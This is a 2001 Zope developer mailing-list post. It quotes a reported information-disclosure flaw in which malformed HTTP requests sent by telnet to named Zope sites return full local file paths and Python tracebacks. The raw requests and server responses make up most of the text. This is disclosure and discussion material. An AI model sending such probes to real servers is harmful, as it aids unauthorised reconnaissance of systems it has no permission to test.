Do others consider this a vulnerability? While it reveals more
information than people might want, I'm curious about scenarios under
which it could be exploited.
If any of you know of something *specific*, meaning it's a genuinely
exploitable vulnerability, please email me or Brian Lloyd
([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.
--Paul
ALife wrote:
> Found vulnerability: retrieve a full path to local files in Zope.
>
> ---[ Example 1 (Linux):
>
> telnet www.zope.org 80
>
> PROPFIND / HTTP/1.0
>
> F
> G
> H
> J
> K
> L
> HTTP/1.0 500 Internal Server Error
> Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
> Date: Mon, 10 Sep 2001 15:38:59 GMT
> Content-Length: 7058
> Ms-Author-Via: DAV
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
> Sheets.py
> Bobo-Exception-Type: TypeError
> Content-Length: 7058
> Ms-Author-Via: DAV
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
> Sheets.py
> Bobo-Exception-Type: TypeError
> Content-Type: text/html
> Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//
> EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome
> to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css"
> type="text/css"> </HEAD> <BODY B
> Bobo-Exception-Line: 369
>
>
> ...
>
>
> <!--
> Traceback (innermost last):
> File /usr/local/base/Zope-2.3.2-modified/l
> ib/python/ZPublisher/Publish.py, line 223, in publish_module
> File /usr/local/ba
> se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
> F
> ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i
> n zpublisher_exception_hook
> (Object: ApplicationDefaultPermissions)
> File /us
> r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in
> publish
> File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p
> y, line 160, in mapply
> (Object: PROPFIND)
> File /usr/local/base/Zope-2.3.2-mo
> dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
> (Object: PR
> OPFIND)
> File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py,
> line 222, in PROPFIND
> (Object: ApplicationDefaultPermissions)
> File /usr/loc
> al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
> Fi
> le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i
> n apply
> File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py,
> line 219, in apply
> File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d
> avcmds.py, line 219, in apply
> File /usr/local/base/Zope-2.3.2-modified/lib/pyth
> on/webdav/davcmds.py, line 175, in apply
> File /usr/local/base/Zope-2.3.2-modifi
> ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
> (Object: Virtu
> al)
> TypeError: (see above)
>
> -->
> Host has closed connection.
>
> ---[ Example 2 (Linux):
> telnet www.zope.com 80
>
> GGGG / HTTP/1.0
> or NOTREALCOMMAND / HTTP/1.0
>
>
> HTTP/1.0 404 Not Found
> Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
> Date: Fri, 21 Sep 2001 12:51:48 GMT
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H
> TTPResponse.py
> Content-Type: text/html
> Bobo-Exception-Type: NotFound
> Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//
> EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome
> to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css"
> type="text/css"> </HEAD> <BODY B
> Content-Length: 5845
> Bobo-Exception-Line: 547
>
> < ... >
>
> <!--
> Traceback (innermost last):
> File /
> usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i
> n publish_module
> File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher
> /Publish.py, line 187, in publish
> File /usr/local/base/Zope-2.3.2-modified/lib/
> python/Zope/__init__.py, line 221, in zpublisher_exception_hook
> (Object: Appl
> icationDefaultPermissions)
> File /usr/local/base/Zope-2.3.2-modified/lib/python/
> ZPublisher/Publish.py, line 173, in publish
> File /usr/local/base/Zope-2.3.2-mod
> ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
> File /usr/loc
> al/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 547, in
> notFoundError
> NotFound: (see above)
>
> -->
> Host has closed connection.
>
>
> ---[ Example 3 (Win32):
>
> OPTIONS / HTTP/1.0
> or NOTREALCOMMAND / HTTP/1.0
>
> HTTP/1.0 404 Not Found
> Server: Zope/Zope 2.3.2 (binary release, python 1.5.2, win32-x86) ZServer/1.1b1
> Date: Mon, 10 Sep 2001 15:06:43 GMT
> Bobo-Exception-File: D:\INSTOC~1\lib\python\webdav\NullResource.py
> Bobo-Exception-Type: Not Found
> Content-Type: text/html
> Location: http://SERVERNAME
> Bobo-Exception-Value: bobo exception
> Content-Length: 756
> Bobo-Exception-Line: 122
>
> <html><head><title>::</title></head><body bgcolor="#FFFFFF">
>
> <h2>Ошибка!</h2>
> <p>О
> шибка при попытке опубликовать ресурс.</p>
> <hr noshade>
> </body></html>
> <!--
> Tracebac
> k (innermost last):
> File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 223
> , in publish_module
> File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 187
> , in publish
> File D:\INSTOC~1\lib\python\Zope\__init__.py, line 221, in zpublis
> her_exception_hook
> (Object: iVirtualHostBase)
> File D:\INSTOC~1\lib\python\ZP
> ublisher\Publish.py, line 162, in publish
> File D:\INSTOC~1\lib\python\ZPublishe
> r\BaseRequest.py, line 340, in traverse
> File D:\INSTOC~1\lib\python\webdav\Null
> Resource.py, line 122, in __bobo_traverse__
> (Object: iVirtualHostBase)
> Not Fou
> nd: (see above)
>
> -->
> Host has closed connection.
>
>
> _______________________________________________
> Zope-Dev maillist - [EMAIL PROTECTED]
> http://lists.zope.org/mailman/listinfo/zope-dev
> ** No cross posts or HTML encoding! **
> (Related lists -
> http://lists.zope.org/mailman/listinfo/zope-announce
> http://lists.zope.org/mailman/listinfo/zope )
>
_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
** No cross posts or HTML encoding! **
(Related lists -
http://lists.zope.org/mailman/listinfo/zope-announce
http://lists.zope.org/mailman/listinfo/zope )